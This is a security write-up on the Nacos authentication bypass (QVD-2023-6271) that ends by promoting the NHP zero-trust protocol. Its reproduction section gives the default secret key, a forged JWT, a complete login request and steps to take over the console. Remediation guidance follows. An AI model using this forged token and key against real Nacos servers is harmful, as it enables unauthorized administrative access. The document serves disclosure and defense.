Enhancing Nacos Security: The Evolution from Traditional Security to the Innovative NHP Protocol

0x01 Overview#

In the past four years, the author has deeply realized the limitations of traditional cybersecurity strategies through participation in various offensive and defensive drills, network protection actions, and key security tasks. These practical experiences have not only deepened the understanding of cybersecurity and digital security within the community but also revealed how traditional security measures have become insufficient in an ever-evolving threat landscape. Particularly in the 2023 network protection efforts, the Nacos 0-day vulnerability incident has garnered widespread attention.

In this context, traditional security products, such as firewalls and Web Application Firewalls (WAF), appear to be inadequate in addressing application layer vulnerabilities. While these products can effectively defend against certain network-level attacks, they often fail to provide sufficient protection against complex application layer vulnerabilities, such as the authentication bypass issue faced by Nacos. Additionally, the patching cycle for such vulnerabilities is often lengthy, meaning that systems remain in a high-risk state until vulnerabilities are disclosed and fixed, leading to breaches during HW operations.

This article aims to explore the limitations of traditional security products in addressing complex network threats through the lens of the Nacos vulnerability QVD-2023-6271, and to introduce an emerging cybersecurity approach—the Network Resource Hyper-Invisibility Protocol (NHP Protocol). As a core component of the zero-trust security framework, the NHP Protocol is designed for resource invisibility and secure access in network environments. Guided by the security philosophy of "never trust, always verify," it controls access to data resources through a rigorous authentication and authorization process. This approach significantly enhances the security of the system in the context of Nacos. By applying the NHP Protocol to Nacos, it can effectively address specific security challenges, such as authentication bypass vulnerabilities, while also improving the overall security and resilience of the entire system. This article will delve into the application of the NHP Protocol in enhancing Nacos security and its advantages over traditional security products.

0x02 Vulnerability Impact Scope#

Nacos is a technology under Alibaba's open-source SpringCloud Alibaba project. Nacos is a platform for dynamic configuration management, service discovery, and service management, which helps developers build and manage microservices architecture applications more easily. It provides a centralized way to manage configuration information and can also be used to discover and register microservices to ensure they can communicate and collaborate effectively. This makes Nacos one of the powerful tools for building distributed systems. Currently, the GitHub repository has over 28.3k stars.

Vulnerability Introduction: The open-source service management platform Nacos has an authentication bypass vulnerability. Under the default configuration, the token.secret.key is not modified, allowing remote attackers to bypass key authentication and access the backend, leading to system control and other consequences.

Affected Versions: Nacos <= 2.2.0

Exploitation Difficulty: Low

Vulnerability ID: NVDB-CNVDB-2023674205 QVD-2023-6271

Threat Level: Severe, capable of causing remote code execution.

Comprehensive Evaluation: The vulnerability is easy to exploit and can lead to remote code execution in external network scenarios. It has been publicly disclosed and can be exploited by hackers for widespread scanning.

0x03 Attack Principle#

In Nacos, the token.secret.key value is fixed.

key=SecretKey012345678901234567890123456789012345678901234567890123456789

Using this default key allows for JWT construction, directly accessing the backend.

0x04 Reproduction Steps#

IP Address	Purpose	Remarks
172.17.0.1	Target Machine	Set up and start Docker service via configuration
192.168.31.31	Attacker Kali	Attacker machine

Environment Setup#

Windows Environment Setup#

This vulnerability requires a JAVA environment. Referencing existing reproduction articles online, use jdk-11.0.2_windows-x64_bin.exe.

Download link: https://github.com/alibaba/nacos/releases/tag/2.2.0

Since the vulnerability has been fixed in versions after 2.2.0, use the 2.2.0 package.

After downloading, place it in the virtual machine and execute startup.cmd -m standalone.

Once executed successfully, Nacos will start locally.

Seeing the output information as shown above indicates successful setup. Access via the path:

http://192.168.31.31:8848/nacos/#/login

Linux Docker Setup for Nacos#

This vulnerability reproduction uses Docker. Execute the following commands in Docker:

docker search nacos # Find suitable Nacos version
docker pull nacos/nacos-server # Download image

Set up mounts:

mkdir -p /tmp/nacos/logs/                      # Create logs directory
mkdir -p /tmp/nacos/init.d/

Modify the configuration file:

vim /tmp/nacos/init.d/custom.properties 
server.contextPath=/nacos
server.servlet.contextPath=/nacos
server.port=8848
spring.datasource.platform=mysql
db.num=1
db.url.0=jdbc:mysql://127.0.0.1:3306/nacos-config? characterEncoding=utf8&connectTimeout=1000&socketTimeout=3000&autoReconnect=true # Modify port here
db.user=root # Username
db.password=123456 # Password
nacos.cmdb.dumpTaskInterval=3600
nacos.cmdb.eventTaskInterval=10
nacos.cmdb.labelTaskInterval=300
nacos.cmdb.loadDataAtStart=false
management.metrics.export.elastic.enabled=false
management.metrics.export.influx.enabled=false
server.tomcat.accesslog.enabled=true
server.tomcat.accesslog.pattern=%h %l %u %t "%r" %s %b %D %{User-Agent}i
nacos.security.ignore.urls=/,/**/*.css,/**/*.js,/**/*.html,/**/*.map,/**/*.svg,/**/*.png,/**/*.ico,/console-fe/public/**,/v1/auth/login,/v1/console/health/**,/v1/cs/**,/v1/ns/**,/v1/cmdb/**,/actuator/**,/v1/console/server/**
nacos.naming.distro.taskDispatchThreadCount=1
nacos.naming.distro.taskDispatchPeriod=200
nacos.naming.distro.batchSyncKeyCount=1000
nacos.naming.distro.initDataRatio=0.9
nacos.naming.distro.syncRetryDelay=5000
nacos.naming.data.warmup=true
nacos.naming.expireInstance=true

Start the container:

docker run --name nacos -d -p 8848:8848 -p 9848:9848 --privileged=true --restart=always -e JVM_XMS=256m -e JVM_XMS=256m -e MODE=standalone -e PREFER_HOST_MODE=hostname -e PREFER_HOST_MODE=hostname -v /tmp/nacos/logs:/home/nacos/logs  -v /tmp/nacos/init.d/custom.properties:/home/nacos/init.d/custom.properties nacos/nacos-server

After successfully starting the container, if there are issues with Docker, execute the following command to start the container normally:

docker exec -it [container hash] /bin/bash # Enter Docker container
cd bin
sh docker-startup.sh

Access the website at http://192.168.31.31:8848/nacos

Successfully opened the website.

4.2 Vulnerability Reproduction#

In Nacos, the token.secret.key is fixed, located in the conf directory under application.properties.

In my environment, the key value is: SecretKey012345678901234567890123456789012345678901234567890123456789}

Using this value allows for JWT construction. Access https://jwt.io/ and input the default key value.

{
  "alg": "HS256",
  "typ": "JWT"
}

{
   "sub":"nacos",
   "exp":"1704724306"
}

Here, the exp value is set to a future timestamp, later than the current time.

Note that on the website, the secret base64 encoded option needs to be checked.

Add the Authorization request header in the data packet as follows:

POST /nacos/v1/auth/users/login HTTP/1.1
Host: 192.168.31.31:8848
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: http://139.196.217.155
Connection: close
Referer: http://139.196.217.155/nacos/
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6IjE3MDQ3MjQzMDYifQ.tjGozAqCoY1r0AKy8fnF1qORQAtF-7-dDrnBR2t2-08

username=admin&password=123456

Send the data packet and intercept the response packet to obtain the access_token.

Copy and save all obtained information, then log in normally, intercept the response packet, and modify it to the copied information to complete the login successfully.

0x05 Remediation Plan#

Upgrade to the latest version.
Delete the following options from the default configuration; Nacos must be manually configured at startup.

This can be done by modifying the conf/application.properties file:

nacos.core.auth.server.identity.key
nacos.core.auth.server.identity.value
nacos.core.auth.plugin.nacos.token.secret.key

Modify the Nacos application.properties configuration file to set nacos.core.auth.enabled=true, enabling service identity recognition.
Restart Nacos.

At this point, if we access the previous interface and execute it in the browser, if this appears:

A 403 indicates that the modification was successful.

Enable permission authentication for Nacos registration and configuration center.

After completing the above modifications, re-scan for vulnerabilities; the Nacos permission bypass vulnerability (CVE-2021-29441) will no longer appear.

0x06 Limitations of Traditional Security Products in Handling Nacos Vulnerabilities#

In the field of cybersecurity, traditional security products, such as Alibaba Cloud Security Center (formerly Cloud Knight), while providing basic protective measures, may fall short in addressing complex and advanced security threats. Taking the Nacos vulnerability as an example, traditional security products primarily rely on passive and generic strategies, such as recommending application upgrades or modifying server configuration files. While this approach is effective for immediate defense against certain known vulnerabilities, it fundamentally does not address the potential risks of security vulnerabilities.

After discovering the Nacos authentication bypass vulnerability, Alibaba Cloud Security Center's recommended remediation strategy mainly involved application upgrades and modifications to the configuration files of native cloud server applications. While this approach can provide some level of protection, it does not offer a systematic solution to address deeper security issues. For instance, merely upgrading applications cannot completely prevent future security vulnerabilities, and directly modifying configuration files may impact the normal operation of applications. More importantly, traditional security products typically only provide effective protective measures against known threats. They often lack the ability to prevent unknown threats and cannot proactively identify and defend against undiscovered security vulnerabilities. Additionally, relying on cloud service providers for security intervention may lead customers to become dependent on their security status, neglecting their own responsibilities in security management and continuous monitoring.

Therefore, when dealing with complex vulnerabilities like Nacos, relying solely on traditional cloud security products may not provide sufficient protection. To truly enhance security and reduce dependence on external services, it is necessary to explore more advanced and proactive security measures, such as the NHP (Network Resource Hyper-Invisibility) Protocol. The following sections will detail the application of the NHP Protocol in enhancing Nacos security and its advantages over traditional cloud security products.

0x07 Application of the NHP Protocol in Enhancing Nacos Security#

Overview of the NHP Protocol#

The Network Resource Hyper-Invisibility Protocol (NHP) is one of the core components of the zero-trust security framework, designed for resource invisibility and secure access in network environments. Guided by the zero-trust security philosophy of "never trust, always verify," the NHP Protocol controls access to data resources through a rigorous authentication and authorization process, ensuring that only authenticated and authorized legitimate requesters can access the target resources. The technical architecture of the NHP Protocol includes components such as NHP proxies, NHP servers, and NHP access control, working together to hide the true network location of data resources and provide secure authorized access.

NHP Protocol and Nacos Security#

In the application scenario of Nacos, the application of the NHP Protocol can significantly enhance the system's security. In response to the authentication bypass vulnerability faced by Nacos, the NHP Protocol provides an effective defense mechanism. Through NHP, the Nacos server can achieve "invisibility" on the network, meaning that it is not visible to potential attackers or unauthorized users without verification. The door-knocking process in the NHP Protocol ensures that only authenticated requesters can discover and access the Nacos server, greatly reducing the chances of unauthorized access and potential attacks. Additionally, the NHP Protocol provides an extra layer of security for Nacos through its distributed architecture and efficient encrypted communication mechanisms, ensuring the integrity and confidentiality of data communication.

Advantages of the NHP Protocol#

The application of the NHP Protocol in enhancing Nacos security brings multiple advantages. First, by hiding the network location of the Nacos service, it significantly reduces the risk of being maliciously scanned and identified. Second, the authentication and authorization mechanisms of the NHP Protocol provide stronger access control for Nacos, ensuring that only strictly authenticated users can access the service. This is particularly critical for defending against authentication vulnerabilities. Furthermore, the design of the NHP Protocol also considers performance and scalability, ensuring that enhancing security does not adversely affect the performance of the Nacos system. Finally, the application of the NHP Protocol helps improve the overall security posture of the Nacos system, making it more adaptable to today's complex and ever-changing cybersecurity environment.

Overall, applying the NHP Protocol to Nacos not only effectively addresses specific security challenges, such as authentication bypass vulnerabilities, but also enhances the overall security and resilience of the entire system on a broader level. This makes the NHP Protocol an important component in enhancing the security architecture of Nacos, providing an innovative and effective method for protecting critical data resources.